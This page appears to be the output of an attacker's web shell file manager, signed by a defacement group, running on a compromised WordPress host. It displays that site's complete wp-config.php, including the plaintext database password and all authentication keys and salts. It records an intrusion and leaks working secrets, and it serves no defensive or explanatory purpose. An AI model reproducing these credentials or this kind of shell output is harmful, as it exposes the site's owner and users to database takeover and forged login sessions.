whoami7 - Manager
:
/
data
/
vhosts
/
startupclm
/
www
/
Upload File:
files >> /data/vhosts/startupclm/www/wp-config.php
<?php /** * The base configuration for WordPress * * The wp-config.php creation script uses this file during the installation. * You don't have to use the website, you can copy this file to "wp-config.php" * and fill in the values. * * This file contains the following configurations: * * * Database settings * * Secret keys * * Database table prefix * * ABSPATH * * @link https://developer.wordpress.org/advanced-administration/wordpress/wp-config/ * * @package WordPress */ // ** Database settings - You can get this info from your web host ** // /** The name of the database for WordPress */ define( 'DB_NAME', 'startupclm' ); /** Database username */ define( 'DB_USER', 'startupclm' ); /** Database password */ define( 'DB_PASSWORD', 'Zu1TmKfuTFh9' ); /** Database hostname */ define( 'DB_HOST', 'localhost' ); /** Database charset to use in creating database tables. */ define( 'DB_CHARSET', 'utf8mb4' ); /** The database collate type. Don't change this if in doubt. */ define( 'DB_COLLATE', '' ); /**#@+ * Authentication unique keys and salts. * * Change these to different unique phrases! You can generate these using * the {@link https://api.wordpress.org/secret-key/1.1/salt/ WordPress.org secret-key service}. * * You can change these at any point in time to invalidate all existing cookies. * This will force all users to have to log in again. * * @since 2.6.0 */ define( 'AUTH_KEY', '#{9Z(*UlZf]Y@4;//v5T@%(0TtH,9K*;E{#N|qVc:a#gWnZli%Ig,DE]}fg%y Sh' ); define( 'SECURE_AUTH_KEY', '_YekpVp+2bSEn5>vfHuv$tVKiw:--1lw=D(7$>c/!,VhOYH]- G``L=kG?Wtd&1k' ); define( 'LOGGED_IN_KEY', 'diX$n$rLL]q<9]@RmK.{mhs6oj=IJ~GCWjD(x kMKpJ5?r:(YIn>)g/m^Lj2UEsg' ); define( 'NONCE_KEY', 'Q~BxPUsvi-i sd5Lx&|?CFqqL^U(MD-:dk26Tctb7Ve_%i{)TsVS&{lAf%=tE.Sz' ); define( 'AUTH_SALT', 'nOf]S3K{@t]ftd]N<~T{9J@Za|KrZA|YEsazdbY8F`9z3x=Pbr[0[BcC/{Nsoo|s' ); define( 'SECURE_AUTH_SALT', '5A_L>^sX7ug_0#B@%^)}ppMH]=)rcIc)(LZlbE4;(0hHr_Z{gLPP;Vuysde{D @@' ); define( 'LOGGED_IN_SALT', 'KM1)xmJn*U{ECpOlVdYj6FgE{B]L~g8&$[IC9g4)ER9-G<H| 5is;G/M?:v~/t8x' ); define( 'NONCE_SALT', 'kPxK(ueG.,`yYjH}lSdKPqo5a$YMVdD0`/Mm_b.^&3P6_PCjWa6oNi@5=$3+T; w' ); /**#@-*/ /** * WordPress database table prefix. * * You can have multiple installations in one database if you give each * a unique prefix. Only numbers, letters, and underscores please! */ $table_prefix = 'wp_'; /** * For developers: WordPress debugging mode. * * Change this to true to enable the display of notices during development. * It is strongly recommended that plugin and theme developers use WP_DEBUG * in their development environments. * * For information on other constants that can be used for debugging, * visit the documentation. * * @link https://developer.wordpress.org/advanced-administration/debug/debug-wordpress/ */ define( 'WP_DEBUG', false ); /* Add any custom values between this line and the "stop editing" line. */ /* That's all, stop editing! Happy publishing. */ /** Absolute path to the WordPress directory. */ if ( ! defined( 'ABSPATH' ) ) { define( 'ABSPATH', __DIR__ . '/' ); } /** Sets up WordPress vars and included files. */ require_once ABSPATH . 'wp-settings.php';
Copyright ©2021 || Defacer Indonesia